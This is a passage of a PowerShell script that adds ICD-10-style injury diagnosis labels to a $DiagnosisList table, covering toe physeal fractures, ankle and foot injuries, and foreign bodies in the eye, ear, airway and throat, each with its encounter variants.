$DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of left toe","Salter-Harris Type III physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of unspecified toe","Salter-Harris Type III physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of right toe","Salter-Harris Type IV physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of left toe","Salter-Harris Type IV physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of phalanx of unspecified toe","Salter-Harris Type IV physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of right toe","Other physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of left toe","Other physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of phalanx of unspecified toe","Other physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right ankle","Other specified injuries of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right ankle","Other specified injuries of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right ankle","Other specified injuries of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left ankle","Other specified injuries of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left ankle","Other specified injuries of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left ankle","Other specified injuries of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified ankle","Other specified injuries of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified ankle","Other specified injuries of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified ankle","Other specified injuries of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right foot","Other specified injuries of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right foot","Other specified injuries of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right foot","Other specified injuries of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left foot","Other specified injuries of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left foot","Other specified injuries of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left foot","Other specified injuries of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified foot","Other specified injuries of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified foot","Other specified injuries of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of unspecified foot","Other specified injuries of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right ankle","Unspecified injury of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right ankle","Unspecified injury of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right ankle","Unspecified injury of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left ankle","Unspecified injury of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left ankle","Unspecified injury of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left ankle","Unspecified injury of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified ankle","Unspecified injury of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified ankle","Unspecified injury of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified ankle","Unspecified injury of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right foot","Unspecified injury of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right foot","Unspecified injury of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right foot","Unspecified injury of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left foot","Unspecified injury of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left foot","Unspecified injury of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left foot","Unspecified injury of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified foot","Unspecified injury of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified foot","Unspecified injury of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified foot","Unspecified injury of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified multiple injuries","Unspecified multiple injuries, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified multiple injuries","Unspecified multiple injuries, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified multiple injuries","Unspecified multiple injuries, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified body region","Other injury of unspecified body region, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified body region","Other injury of unspecified body region, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified body region","Other injury of unspecified body region, sequela") + $null = $DiagnosisList.Rows.Add("Injury, unspecified","Injury, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury, unspecified","Injury, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury, unspecified","Injury, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Suicide attempt","Suicide attempt, initial encounter") + $null = $DiagnosisList.Rows.Add("Suicide attempt","Suicide attempt, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Suicide attempt","Suicide attempt, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, unspecified eye","Foreign body in cornea, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, unspecified eye","Foreign body in cornea, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, unspecified eye","Foreign body in cornea, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, right eye","Foreign body in cornea, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, right eye","Foreign body in cornea, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, right eye","Foreign body in cornea, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, left eye","Foreign body in cornea, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, left eye","Foreign body in cornea, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in cornea, left eye","Foreign body in cornea, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, unspecified eye","Foreign body in conjunctival sac, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, unspecified eye","Foreign body in conjunctival sac, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, unspecified eye","Foreign body in conjunctival sac, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, right eye","Foreign body in conjunctival sac, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, right eye","Foreign body in conjunctival sac, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, right eye","Foreign body in conjunctival sac, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, left eye","Foreign body in conjunctival sac, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, left eye","Foreign body in conjunctival sac, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in conjunctival sac, left eye","Foreign body in conjunctival sac, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, unspecified eye","Foreign body in other and multiple parts of external eye, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, unspecified eye","Foreign body in other and multiple parts of external eye, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, unspecified eye","Foreign body in other and multiple parts of external eye, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, right eye","Foreign body in other and multiple parts of external eye, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, right eye","Foreign body in other and multiple parts of external eye, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, right eye","Foreign body in other and multiple parts of external eye, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, left eye","Foreign body in other and multiple parts of external eye, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, left eye","Foreign body in other and multiple parts of external eye, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in other and multiple parts of external eye, left eye","Foreign body in other and multiple parts of external eye, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, unspecified eye","Foreign body on external eye, part unspecified, unspecified eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, unspecified eye","Foreign body on external eye, part unspecified, unspecified eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, unspecified eye","Foreign body on external eye, part unspecified, unspecified eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, right eye","Foreign body on external eye, part unspecified, right eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, right eye","Foreign body on external eye, part unspecified, right eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, right eye","Foreign body on external eye, part unspecified, right eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, left eye","Foreign body on external eye, part unspecified, left eye, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, left eye","Foreign body on external eye, part unspecified, left eye, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body on external eye, part unspecified, left eye","Foreign body on external eye, part unspecified, left eye, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in right ear","Foreign body in right ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in right ear","Foreign body in right ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in right ear","Foreign body in right ear, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in left ear","Foreign body in left ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in left ear","Foreign body in left ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in left ear","Foreign body in left ear, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in ear, unspecified ear","Foreign body in ear, unspecified ear, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in ear, unspecified ear","Foreign body in ear, unspecified ear, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in ear, unspecified ear","Foreign body in ear, unspecified ear, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in nasal sinus","Foreign body in nasal sinus, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in nasal sinus","Foreign body in nasal sinus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in nasal sinus","Foreign body in nasal sinus, sequela") + $null = $DiagnosisList.Rows.Add("Foreign body in nostril","Foreign body in nostril, initial encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in nostril","Foreign body in nostril, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Foreign body in nostril","Foreign body in nostril, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing asphyxiation","Unspecified foreign body in pharynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing asphyxiation","Unspecified foreign body in pharynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing asphyxiation","Unspecified foreign body in pharynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing other injury","Unspecified foreign body in pharynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing other injury","Unspecified foreign body in pharynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in pharynx causing other injury","Unspecified foreign body in pharynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing asphyxiation","Gastric contents in pharynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing asphyxiation","Gastric contents in pharynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing asphyxiation","Gastric contents in pharynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing other injury","Gastric contents in pharynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing other injury","Gastric contents in pharynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in pharynx causing other injury","Gastric contents in pharynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing asphyxiation","Food in pharynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing asphyxiation","Food in pharynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing asphyxiation","Food in pharynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing other injury","Food in pharynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing other injury","Food in pharynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in pharynx causing other injury","Food in pharynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing asphyxiation","Other foreign object in pharynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing asphyxiation","Other foreign object in pharynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing asphyxiation","Other foreign object in pharynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing other injury","Other foreign object in pharynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing other injury","Other foreign object in pharynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in pharynx causing other injury","Other foreign object in pharynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing asphyxiation","Unspecified foreign body in larynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing asphyxiation","Unspecified foreign body in larynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing asphyxiation","Unspecified foreign body in larynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing other injury","Unspecified foreign body in larynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing other injury","Unspecified foreign body in larynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in larynx causing other injury","Unspecified foreign body in larynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing asphyxiation","Gastric contents in larynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing asphyxiation","Gastric contents in larynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing asphyxiation","Gastric contents in larynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing other injury","Gastric contents in larynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing other injury","Gastric contents in larynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in larynx causing other injury","Gastric contents in larynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in larynx causing asphyxiation","Food in larynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in larynx causing asphyxiation","Food in larynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in larynx causing asphyxiation","Food in larynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in larynx causing other injury","Food in larynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in larynx causing other injury","Food in larynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in larynx causing other injury","Food in larynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing asphyxiation","Other foreign object in larynx causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing asphyxiation","Other foreign object in larynx causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing asphyxiation","Other foreign object in larynx causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing other injury","Other foreign object in larynx causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing other injury","Other foreign object in larynx causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in larynx causing other injury","Other foreign object in larynx causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing asphyxiation","Unspecified foreign body in trachea causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing asphyxiation","Unspecified foreign body in trachea causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing asphyxiation","Unspecified foreign body in trachea causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing other injury","Unspecified foreign body in trachea causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing other injury","Unspecified foreign body in trachea causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in trachea causing other injury","Unspecified foreign body in trachea causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing asphyxiation","Gastric contents in trachea causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing asphyxiation","Gastric contents in trachea causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing asphyxiation","Gastric contents in trachea causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing other injury","Gastric contents in trachea causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing other injury","Gastric contents in trachea causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Gastric contents in trachea causing other injury","Gastric contents in trachea causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Food in trachea causing asphyxiation","Food in trachea causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in trachea causing asphyxiation","Food in trachea causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in trachea causing asphyxiation","Food in trachea causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Food in trachea causing other injury","Food in trachea causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Food in trachea causing other injury","Food in trachea causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Food in trachea causing other injury","Food in trachea causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing asphyxiation","Other foreign object in trachea causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing asphyxiation","Other foreign object in trachea causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing asphyxiation","Other foreign object in trachea causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing other injury","Other foreign object in trachea causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing other injury","Other foreign object in trachea causing other injury, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other foreign object in trachea causing other injury","Other foreign object in trachea causing other injury, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing asphyxiation","Unspecified foreign body in bronchus causing asphyxiation, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing asphyxiation","Unspecified foreign body in bronchus causing asphyxiation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing asphyxiation","Unspecified foreign body in bronchus causing asphyxiation, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing other injury","Unspecified foreign body in bronchus causing other injury, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified foreign body in bronchus causing other injury","Unspecified foreign body in bronchus causing other injury, subsequent 